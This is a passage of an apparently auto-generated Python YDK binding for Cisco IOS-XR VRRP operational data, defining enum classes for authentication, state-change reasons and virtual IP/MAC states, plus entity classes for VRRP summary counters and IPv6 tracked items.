from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBfdSessionState']
class VrrpProtAuth(Enum):
"""
VrrpProtAuth (Enum Class)
Vrrp prot auth
.. data:: authentication_none = 0
Down
.. data:: authentication_text = 1
Simple Text
.. data:: authentication_ip = 2
IP header
"""
authentication_none = Enum.YLeaf(0, "authentication-none")
authentication_text = Enum.YLeaf(1, "authentication-text")
authentication_ip = Enum.YLeaf(2, "authentication-ip")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpProtAuth']
class VrrpStateChangeReason(Enum):
"""
VrrpStateChangeReason (Enum Class)
Vrrp state change reason
.. data:: state_change_bfd_down = 0
BFD session down
.. data:: state_change_virtual_ip_configured = 1
Virtual IP configured
.. data:: state_change_interface_ip = 2
Interface IP update
.. data:: state_change_delay_timer = 3
Delay timer expired
.. data:: state_change_startup = 4
Ready on startup
.. data:: state_change_interface_up = 5
Interface Up update
.. data:: state_change_interface_down = 6
Interface Down update
.. data:: state_change_master_down_timer = 7
Master down timer expired
.. data:: state_change_higher_priority_master = 8
Higher priority advert received
.. data:: state_change_fhrp_admin = 9
FHRP Admin state change
.. data:: state_change_mgo_parent = 10
Change of MGO parent session
.. data:: state_change_chkpt_update = 11
Checkpoint update from Primary VRRP instance
.. data:: state_change_issu_resync = 12
Resync following ISSU primary event
"""
state_change_bfd_down = Enum.YLeaf(0, "state-change-bfd-down")
state_change_virtual_ip_configured = Enum.YLeaf(1, "state-change-virtual-ip-configured")
state_change_interface_ip = Enum.YLeaf(2, "state-change-interface-ip")
state_change_delay_timer = Enum.YLeaf(3, "state-change-delay-timer")
state_change_startup = Enum.YLeaf(4, "state-change-startup")
state_change_interface_up = Enum.YLeaf(5, "state-change-interface-up")
state_change_interface_down = Enum.YLeaf(6, "state-change-interface-down")
state_change_master_down_timer = Enum.YLeaf(7, "state-change-master-down-timer")
state_change_higher_priority_master = Enum.YLeaf(8, "state-change-higher-priority-master")
state_change_fhrp_admin = Enum.YLeaf(9, "state-change-fhrp-admin")
state_change_mgo_parent = Enum.YLeaf(10, "state-change-mgo-parent")
state_change_chkpt_update = Enum.YLeaf(11, "state-change-chkpt-update")
state_change_issu_resync = Enum.YLeaf(12, "state-change-issu-resync")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpStateChangeReason']
class VrrpVipState(Enum):
"""
VrrpVipState (Enum Class)
Vrrp vip state
.. data:: virtual_ip_state_down = 0
Down
.. data:: virtual_ip_state_up = 1
Up
"""
virtual_ip_state_down = Enum.YLeaf(0, "virtual-ip-state-down")
virtual_ip_state_up = Enum.YLeaf(1, "virtual-ip-state-up")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpVipState']
class VrrpVmacState(Enum):
"""
VrrpVmacState (Enum Class)
Vrrp vmac state
.. data:: stored = 0
VMAC stored locally
.. data:: reserved = 1
VMAC reserved in mac table
.. data:: active = 2
VMAC active in mac table
.. data:: reserving = 3
VMAC not yet reserved in mac table
"""
stored = Enum.YLeaf(0, "stored")
reserved = Enum.YLeaf(1, "reserved")
active = Enum.YLeaf(2, "active")
reserving = Enum.YLeaf(3, "reserving")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpVmacState']
class Vrrp(_Entity_):
"""
VRRP operational data
.. attribute:: summary
VRRP summary statistics
**type**\: :py:class:`Summary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Summary>`
**config**\: False
.. attribute:: ipv6
IPv6 VRRP configuration
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6>`
**config**\: False
.. attribute:: ipv4
IPv4 VRRP configuration
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4>`
**config**\: False
.. attribute:: mgo_sessions
VRRP MGO Session information
**type**\: :py:class:`MgoSessions <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp, self).__init__()
self._top_entity = None
self.yang_name = "vrrp"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-vrrp-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary", ("summary", Vrrp.Summary)), ("ipv6", ("ipv6", Vrrp.Ipv6)), ("ipv4", ("ipv4", Vrrp.Ipv4)), ("mgo-sessions", ("mgo_sessions", Vrrp.MgoSessions))])
self._leafs = OrderedDict()
self.summary = Vrrp.Summary()
self.summary.parent = self
self._children_name_map["summary"] = "summary"
self.ipv6 = Vrrp.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self.ipv4 = Vrrp.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.mgo_sessions = Vrrp.MgoSessions()
self.mgo_sessions.parent = self
self._children_name_map["mgo_sessions"] = "mgo-sessions"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp, [], name, value)
class Summary(_Entity_):
"""
VRRP summary statistics
.. attribute:: ipv4_sessions_master_owner
Number of IPv4 sessions in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_master
Number of IPv4 sessions in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_backup
Number of IPv4 sessions in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_init
Number of IPv4 sessions in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_master
Number of IPv4 slaves in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_backup
Number of IPv4 slaves in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_init
Number of IPv4 slaves in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_owner_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_owner_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_backup_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_backup_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_init_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_init_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_master_owner
Number of IPv6 sessions in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_master
Number of IPv6 sessions in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_backup
Number of IPv6 sessions in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_init
Number of IPv6 sessions in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_master
Number of IPv6 slaves in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_backup
Number of IPv6 slaves in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_init
Number of IPv6 slaves in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_owner_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_owner_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_backup_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_backup_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_init_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_init_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv4_state_up
Number of VRRP interfaces with IPv4 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv4_state_down
Number of VRRP interfaces with IPv4 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv4_state_up
Number of tracked interfaces with IPv4 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv4_state_down
Number of tracked interfaces with IPv4 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv6_state_up
Number of VRRP interfaces with IPv6 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv6_state_down
Number of VRRP interfaces with IPv6 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv6_state_up
Number of tracked interfaces with IPv6 capability in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv6_state_down
Number of tracked interfaces with IPv6 capability in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_objects_state_up
Number of tracked objects in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_objects_state_down
Number of tracked objects in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_sessions_up
Number of VRRP IPv4 BFD sessions in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_sessions_down
Number of VRRP IPv4 BFD sessions in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_inactive
Number of VRRP IPv4 BFD sessions in INACTIVE state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_sessions_up
Number of VRRP IPv6 BFD sessions in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_sessions_down
Number of VRRP IPv6 BFD sessions in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_session_inactive
Number of VRRP IPv6 BFD sessions in INACTIVE state
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Summary, self).__init__()
self.yang_name = "summary"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv4_sessions_master_owner', (YLeaf(YType.uint32, 'ipv4-sessions-master-owner'), ['int'])),
('ipv4_sessions_master', (YLeaf(YType.uint32, 'ipv4-sessions-master'), ['int'])),
('ipv4_sessions_backup', (YLeaf(YType.uint32, 'ipv4-sessions-backup'), ['int'])),
('ipv4_sessions_init', (YLeaf(YType.uint32, 'ipv4-sessions-init'), ['int'])),
('ipv4_slaves_master', (YLeaf(YType.uint32, 'ipv4-slaves-master'), ['int'])),
('ipv4_slaves_backup', (YLeaf(YType.uint32, 'ipv4-slaves-backup'), ['int'])),
('ipv4_slaves_init', (YLeaf(YType.uint32, 'ipv4-slaves-init'), ['int'])),
('ipv4_virtual_ip_addresses_master_owner_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-owner-up'), ['int'])),
('ipv4_virtual_ip_addresses_master_owner_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-owner-down'), ['int'])),
('ipv4_virtual_ip_addresses_master_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-up'), ['int'])),
('ipv4_virtual_ip_addresses_master_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-down'), ['int'])),
('ipv4_virtual_ip_addresses_backup_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-backup-up'), ['int'])),
('ipv4_virtual_ip_addresses_backup_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-backup-down'), ['int'])),
('ipv4_virtual_ip_addresses_init_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-init-up'), ['int'])),
('ipv4_virtual_ip_addresses_init_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-init-down'), ['int'])),
('ipv6_sessions_master_owner', (YLeaf(YType.uint32, 'ipv6-sessions-master-owner'), ['int'])),
('ipv6_sessions_master', (YLeaf(YType.uint32, 'ipv6-sessions-master'), ['int'])),
('ipv6_sessions_backup', (YLeaf(YType.uint32, 'ipv6-sessions-backup'), ['int'])),
('ipv6_sessions_init', (YLeaf(YType.uint32, 'ipv6-sessions-init'), ['int'])),
('ipv6_slaves_master', (YLeaf(YType.uint32, 'ipv6-slaves-master'), ['int'])),
('ipv6_slaves_backup', (YLeaf(YType.uint32, 'ipv6-slaves-backup'), ['int'])),
('ipv6_slaves_init', (YLeaf(YType.uint32, 'ipv6-slaves-init'), ['int'])),
('ipv6_virtual_ip_addresses_master_owner_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-owner-up'), ['int'])),
('ipv6_virtual_ip_addresses_master_owner_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-owner-down'), ['int'])),
('ipv6_virtual_ip_addresses_master_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-up'), ['int'])),
('ipv6_virtual_ip_addresses_master_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-down'), ['int'])),
('ipv6_virtual_ip_addresses_backup_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-backup-up'), ['int'])),
('ipv6_virtual_ip_addresses_backup_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-backup-down'), ['int'])),
('ipv6_virtual_ip_addresses_init_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-init-up'), ['int'])),
('ipv6_virtual_ip_addresses_init_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-init-down'), ['int'])),
('interfaces_ipv4_state_up', (YLeaf(YType.uint32, 'interfaces-ipv4-state-up'), ['int'])),
('interfaces_ipv4_state_down', (YLeaf(YType.uint32, 'interfaces-ipv4-state-down'), ['int'])),
('tracked_interfaces_ipv4_state_up', (YLeaf(YType.uint32, 'tracked-interfaces-ipv4-state-up'), ['int'])),
('tracked_interfaces_ipv4_state_down', (YLeaf(YType.uint32, 'tracked-interfaces-ipv4-state-down'), ['int'])),
('interfaces_ipv6_state_up', (YLeaf(YType.uint32, 'interfaces-ipv6-state-up'), ['int'])),
('interfaces_ipv6_state_down', (YLeaf(YType.uint32, 'interfaces-ipv6-state-down'), ['int'])),
('tracked_interfaces_ipv6_state_up', (YLeaf(YType.uint32, 'tracked-interfaces-ipv6-state-up'), ['int'])),
('tracked_interfaces_ipv6_state_down', (YLeaf(YType.uint32, 'tracked-interfaces-ipv6-state-down'), ['int'])),
('tracked_objects_state_up', (YLeaf(YType.uint32, 'tracked-objects-state-up'), ['int'])),
('tracked_objects_state_down', (YLeaf(YType.uint32, 'tracked-objects-state-down'), ['int'])),
('bfd_sessions_up', (YLeaf(YType.uint32, 'bfd-sessions-up'), ['int'])),
('bfd_sessions_down', (YLeaf(YType.uint32, 'bfd-sessions-down'), ['int'])),
('bfd_session_inactive', (YLeaf(YType.uint32, 'bfd-session-inactive'), ['int'])),
('ipv6bfd_sessions_up', (YLeaf(YType.uint32, 'ipv6bfd-sessions-up'), ['int'])),
('ipv6bfd_sessions_down', (YLeaf(YType.uint32, 'ipv6bfd-sessions-down'), ['int'])),
('ipv6bfd_session_inactive', (YLeaf(YType.uint32, 'ipv6bfd-session-inactive'), ['int'])),
])
self.ipv4_sessions_master_owner = None
self.ipv4_sessions_master = None
self.ipv4_sessions_backup = None
self.ipv4_sessions_init = None
self.ipv4_slaves_master = None
self.ipv4_slaves_backup = None
self.ipv4_slaves_init = None
self.ipv4_virtual_ip_addresses_master_owner_up = None
self.ipv4_virtual_ip_addresses_master_owner_down = None
self.ipv4_virtual_ip_addresses_master_up = None
self.ipv4_virtual_ip_addresses_master_down = None
self.ipv4_virtual_ip_addresses_backup_up = None
self.ipv4_virtual_ip_addresses_backup_down = None
self.ipv4_virtual_ip_addresses_init_up = None
self.ipv4_virtual_ip_addresses_init_down = None
self.ipv6_sessions_master_owner = None
self.ipv6_sessions_master = None
self.ipv6_sessions_backup = None
self.ipv6_sessions_init = None
self.ipv6_slaves_master = None
self.ipv6_slaves_backup = None
self.ipv6_slaves_init = None
self.ipv6_virtual_ip_addresses_master_owner_up = None
self.ipv6_virtual_ip_addresses_master_owner_down = None
self.ipv6_virtual_ip_addresses_master_up = None
self.ipv6_virtual_ip_addresses_master_down = None
self.ipv6_virtual_ip_addresses_backup_up = None
self.ipv6_virtual_ip_addresses_backup_down = None
self.ipv6_virtual_ip_addresses_init_up = None
self.ipv6_virtual_ip_addresses_init_down = None
self.interfaces_ipv4_state_up = None
self.interfaces_ipv4_state_down = None
self.tracked_interfaces_ipv4_state_up = None
self.tracked_interfaces_ipv4_state_down = None
self.interfaces_ipv6_state_up = None
self.interfaces_ipv6_state_down = None
self.tracked_interfaces_ipv6_state_up = None
self.tracked_interfaces_ipv6_state_down = None
self.tracked_objects_state_up = None
self.tracked_objects_state_down = None
self.bfd_sessions_up = None
self.bfd_sessions_down = None
self.bfd_session_inactive = None
self.ipv6bfd_sessions_up = None
self.ipv6bfd_sessions_down = None
self.ipv6bfd_session_inactive = None
self._segment_path = lambda: "summary"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Summary, ['ipv4_sessions_master_owner', 'ipv4_sessions_master', 'ipv4_sessions_backup', 'ipv4_sessions_init', 'ipv4_slaves_master', 'ipv4_slaves_backup', 'ipv4_slaves_init', 'ipv4_virtual_ip_addresses_master_owner_up', 'ipv4_virtual_ip_addresses_master_owner_down', 'ipv4_virtual_ip_addresses_master_up', 'ipv4_virtual_ip_addresses_master_down', 'ipv4_virtual_ip_addresses_backup_up', 'ipv4_virtual_ip_addresses_backup_down', 'ipv4_virtual_ip_addresses_init_up', 'ipv4_virtual_ip_addresses_init_down', 'ipv6_sessions_master_owner', 'ipv6_sessions_master', 'ipv6_sessions_backup', 'ipv6_sessions_init', 'ipv6_slaves_master', 'ipv6_slaves_backup', 'ipv6_slaves_init', 'ipv6_virtual_ip_addresses_master_owner_up', 'ipv6_virtual_ip_addresses_master_owner_down', 'ipv6_virtual_ip_addresses_master_up', 'ipv6_virtual_ip_addresses_master_down', 'ipv6_virtual_ip_addresses_backup_up', 'ipv6_virtual_ip_addresses_backup_down', 'ipv6_virtual_ip_addresses_init_up', 'ipv6_virtual_ip_addresses_init_down', 'interfaces_ipv4_state_up', 'interfaces_ipv4_state_down', 'tracked_interfaces_ipv4_state_up', 'tracked_interfaces_ipv4_state_down', 'interfaces_ipv6_state_up', 'interfaces_ipv6_state_down', 'tracked_interfaces_ipv6_state_up', 'tracked_interfaces_ipv6_state_down', 'tracked_objects_state_up', 'tracked_objects_state_down', 'bfd_sessions_up', 'bfd_sessions_down', 'bfd_session_inactive', 'ipv6bfd_sessions_up', 'ipv6bfd_sessions_down', 'ipv6bfd_session_inactive'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Summary']['meta_info']
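The `_leafs` table above pairs each Python attribute with its hyphenated YANG leaf name, and every summary counter is a `uint32` (the `0..4294967295` range repeated throughout the docstrings). A minimal stdlib sketch of that naming convention and range check; `to_yang_name`, `check_uint32`, and `leafs` are illustrative names, not part of the ydk API:

```python
from collections import OrderedDict

UINT32_MAX = 4294967295  # the 0..4294967295 range quoted for every counter


def to_yang_name(attr):
    """Mirror the generated mapping, e.g. ipv4_sessions_master -> ipv4-sessions-master."""
    return attr.replace('_', '-')


def check_uint32(value):
    """Reject values outside the uint32 range declared for the summary counters."""
    if not (0 <= value <= UINT32_MAX):
        raise ValueError("out of range for uint32: %r" % (value,))
    return value


# A tiny stand-in for the generated _leafs table (attribute names taken from Vrrp.Summary).
leafs = OrderedDict(
    (attr, to_yang_name(attr))
    for attr in ('ipv4_sessions_master', 'bfd_sessions_up', 'tracked_objects_state_down')
)
```

This is why, for example, setting `summary.bfd_sessions_up` populates the `bfd-sessions-up` leaf in the encoded payload.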
class Ipv6(_Entity_):
"""
IPv6 VRRP operational data
.. attribute:: track_items
The VRRP tracked item table
**type**\: :py:class:`TrackItems <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.TrackItems>`
**config**\: False
.. attribute:: virtual_routers
The VRRP virtual router table
**type**\: :py:class:`VirtualRouters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters>`
**config**\: False
.. attribute:: interfaces
The VRRP interface table
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.Interfaces>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-items", ("track_items", Vrrp.Ipv6.TrackItems)), ("virtual-routers", ("virtual_routers", Vrrp.Ipv6.VirtualRouters)), ("interfaces", ("interfaces", Vrrp.Ipv6.Interfaces))])
self._leafs = OrderedDict()
self.track_items = Vrrp.Ipv6.TrackItems()
self.track_items.parent = self
self._children_name_map["track_items"] = "track-items"
self.virtual_routers = Vrrp.Ipv6.VirtualRouters()
self.virtual_routers.parent = self
self._children_name_map["virtual_routers"] = "virtual-routers"
self.interfaces = Vrrp.Ipv6.Interfaces()
self.interfaces.parent = self
self._children_name_map["interfaces"] = "interfaces"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6, [], name, value)
class TrackItems(_Entity_):
"""
The VRRP tracked item table
.. attribute:: track_item
A configured VRRP tracked item entry
**type**\: list of :py:class:`TrackItem <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.TrackItems.TrackItem>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.TrackItems, self).__init__()
self.yang_name = "track-items"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-item", ("track_item", Vrrp.Ipv6.TrackItems.TrackItem))])
self._leafs = OrderedDict()
self.track_item = YList(self)
self._segment_path = lambda: "track-items"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.TrackItems, [], name, value)
class TrackItem(_Entity_):
"""
A configured VRRP tracked item entry
.. attribute:: interface_name (key)
The interface name to track
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_name (key)
The name of the tracked interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.TrackItems.TrackItem, self).__init__()
self.yang_name = "track-item"
self.yang_parent_name = "track-items"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id','tracked_interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('tracked_interface_name', (YLeaf(YType.str, 'tracked-interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface_name = None
self.virtual_router_id = None
self.tracked_interface_name = None
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']" + "[tracked-interface-name='" + str(self.tracked_interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/track-items/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.TrackItems.TrackItem, ['interface_name', 'virtual_router_id', 'tracked_interface_name', 'interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.TrackItems.TrackItem']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.TrackItems']['meta_info']
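The `interface-name` keys above are documented with the pattern `[a-zA-Z0-9._/-]+` (the backslashes in the docstrings are reST escaping, not part of the regex). A stdlib `re` sketch of validating a key before using it in a filter; `INTERFACE_NAME_RE` and `is_valid_interface_name` are our names, not part of the model or ydk:

```python
import re

# Unescaped form of the key pattern quoted in the TrackItem docstring.
INTERFACE_NAME_RE = re.compile(r'[a-zA-Z0-9._/-]+')


def is_valid_interface_name(name):
    """True when the entire string matches the documented key pattern."""
    return bool(INTERFACE_NAME_RE.fullmatch(name))
```

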